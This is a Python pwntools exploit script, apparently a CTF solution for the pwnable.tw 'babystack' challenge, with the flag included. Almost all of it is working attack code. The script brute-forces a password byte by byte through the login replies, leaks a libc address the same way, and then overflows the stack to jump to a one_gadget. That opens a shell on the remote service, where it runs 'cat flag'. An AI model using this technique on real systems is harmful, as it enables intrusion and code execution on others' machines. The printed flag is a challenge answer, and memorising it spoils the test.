
@H4niz
Created December 24, 2018 14:56
#!/usr/bin/env python
from pwn import *
__DEBUG__ = 0
__FILE__ = "./babystack"
# Parse the target binary; the resulting ELF object itself is not kept.
ELF(__FILE__)
__BIN__ = ""
__HOST__ = "chall.pwnable.tw"
__PORT__ = 10205
# A non-zero answer selects the local (debug) target, zero the remote service.
__DEBUG__ = int(raw_input("__DEBUG__\n> "))
if __DEBUG__:
    io = process(__FILE__)
    libc_path = "/lib/x86_64-linux-gnu/libc-2.23.so"
    one_gadget = 0xf1147
else:
    io = remote(__HOST__, __PORT__)
    libc_path = "libc_64.so.6"
    one_gadget = 0xf0567
# The one_gadget offset only matches the exact libc build loaded here.
__LIBC__ = ELF(libc_path)
# context.log_level='debug'
#
magic_copy = 0x24
def login(p, endline=True):
    """Pick menu option 1 and submit ``p`` at the password prompt.

    ``p`` is converted with ``str``.  With ``endline`` it goes out via
    ``sendline`` (trailing newline), otherwise via a raw ``send``.
    Operates on the module-level ``io`` connection.
    """
    io.recvuntil(">>")
    io.send("1")
    io.recvuntil(":")
    payload = str(p)
    transmit = io.sendline if endline else io.send
    transmit(payload)
def magic(p):
    """Pick menu option 3 and send ``str(p)``; returns ``io.send``'s result."""
    io.recvuntil(">>")
    io.send("3")
    data = str(p)
    return io.send(data)
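def brutepass(passwd='', l=0x10, begin=1):
    """Recover the password one byte at a time through the login reply.

    Each candidate byte is appended to the known prefix ``passwd`` and
    submitted with ``login``; a reply containing "Success" confirms it.
    ``l`` bounds how many bytes are recovered, ``begin`` is the first byte
    value tried in each round.  Returns the recovered password.  If a round
    accepts no candidate byte the loop stops early and the partial result is
    returned (the original spun forever in that case).
    """
    count = 1
    while count <= l:
        for i in xrange(begin, 0x100):
            print count
            login(passwd + chr(i))
            res = io.recvuntil("!")
            if "Success" in res:
                passwd += chr(i)
                print "Passwd: %s" % passwd
                count += 1
                # The service is sent "1" before the next round — inferred
                # from the flow, not verified here.
                io.sendline("1")
                break
        else:
            # No byte in this round matched: stop instead of looping forever.
            break
    return passwd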
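# Stage 1: recover the stored password byte by byte.
passwd = brutepass()
print "[+] Passwd found: " + repr(passwd)
print "[+] Len: ", len(passwd)
# First login payload: password padded to 0x40 with "P", then eight "R"
# bytes; sent without a trailing newline.  (The former pwd = passwd + "1"*8
# + "2"*8 + "3"*8 lines were dead — pwd was reassigned right below.)
log = passwd.ljust(0x40, "P")
log += "R"*8
# Known prefix for the second byte-by-byte comparison below.
pwd = "R"*8
# gdb script, used only on a local (__DEBUG__) run.
breakpoints = """
brva 0xEBB
brva 0xF87
"""
login(log, endline=False)
login("\x00")
magic("M"*0x3f)
io.recvuntil("copy !")
io.sendline('1')
if __DEBUG__:
    # Pass the script so the breakpoints above are actually set; the
    # original called gdb.attach(io) and never used `breakpoints`.
    gdb.attach(io, breakpoints)
# Stage 2: recover six further bytes with the same reply check, prefixed
# by pwd.
libc = ''
count = 0
while count < 6:
    for j in range(0x1, 0x100):
        login(pwd + chr(j))
        res = io.recvuntil("!")
        if "Success" in res:
            libc += chr(j)
            pwd += chr(j)
            io.sendline("1")
            count += 1
            break
    else:
        # No byte matched: stop rather than spin forever (libcbase below
        # will then be wrong).
        break
# The leaked bytes are treated as a pointer 9 bytes past _IO_file_setbuf in
# the matching libc; subtracting gives the library base.
libcbase = u64(libc.ljust(8, "\x00")) - __LIBC__.symbols['_IO_file_setbuf'] - 9
ret = libcbase + one_gadget
print "[-] libcbase: %#x"%libcbase
print "[-] ret: %#x"%ret
# Second login payload: padded password, password again, eight 0x31 bytes,
# sixteen "B" bytes, then the computed one_gadget address.
log = passwd.ljust(0x40, "P")
log += passwd
log += p64(0x3131313131313131)
log += "B"*16
log += p64(ret)
login(log, endline=False)
login("\x00")
magic("M"*0x3f)
io.recvuntil("copy !")
io.sendline("2")  # trigger
io.sendline("cat flag")
io.interactive()
#FLAG{Its_juS7_a_st4ck0v3rfl0w}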